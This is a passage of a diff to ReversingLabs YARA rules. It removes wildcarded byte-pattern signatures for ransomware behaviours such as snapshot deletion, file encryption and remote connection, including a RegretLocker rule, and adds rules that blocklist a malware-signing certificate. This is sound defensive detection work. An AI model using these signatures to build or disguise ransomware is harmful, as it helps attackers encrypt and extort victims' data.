-            ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84
-            C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ??
-            ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ??
-            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
-            15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-        }
-		$delete_volumes_snapshots_p2 = {
-            EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A
-            ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33
-            FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72
-            ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ??
-            ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57
-            8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $delete_volumes_snapshots_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shan Feng" and pe.signatures [ i ] . serial == "15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RegretLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4"
-		date = "2021-04-02"
-		modified = "2021-04-02"
+		id = "c6ba359e-4883-534d-bc86-8c063e54c92f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16854-L16870"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RegretLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ??
-            72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ??
-            ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53
-            56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D
-            ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ??
-            C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88
-            19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ??
-            ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ??
-            0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB
-            8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84
-        }
-		$remote_connection_p2 = {
-            8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A
-            46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ??
-            ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6
-            45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ??
-            88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ??
-            ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ??
-            89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-        }
-		$remote_connection_p3 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89
-            5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B
-            F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ??
-            ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45
-        }
-		$remote_connection_p4 = {
-            89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A
-            ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ??
-            ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ??
-            8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ??
-            89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89
-        }
-		$remote_connection_p5 = {
-            5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58
-            FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68
-            ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ??
-            C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50
-            8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ??
-            ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ??
-            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ??
-            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7
-            45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ??
-            88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8
-        }
-		$encrypt_files_p1 = {
-            8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89
-            45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ??
-            8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D
-            4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A
-            ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ??
-            C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ??
-            ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ??
-            ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75
-            ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ??
-            ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99
-            F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B
-            75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC
-            F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35
-            ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p2 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57
-            56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59
-            59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ??
-            ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89
-            4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ??
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8
-            ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ??
-            ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F
-            46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D
-            ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B
-        }
-		$encrypt_files_p3 = {
-            C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8
-            ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75
-            ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8
-            33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8
-            ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03
-            7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75
-            ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ??
-            8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ??
-            C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ??
-            89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ??
-            E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC
-            ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ??
-            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ??
-            8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
-            8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ??
-            89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3
-        }
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
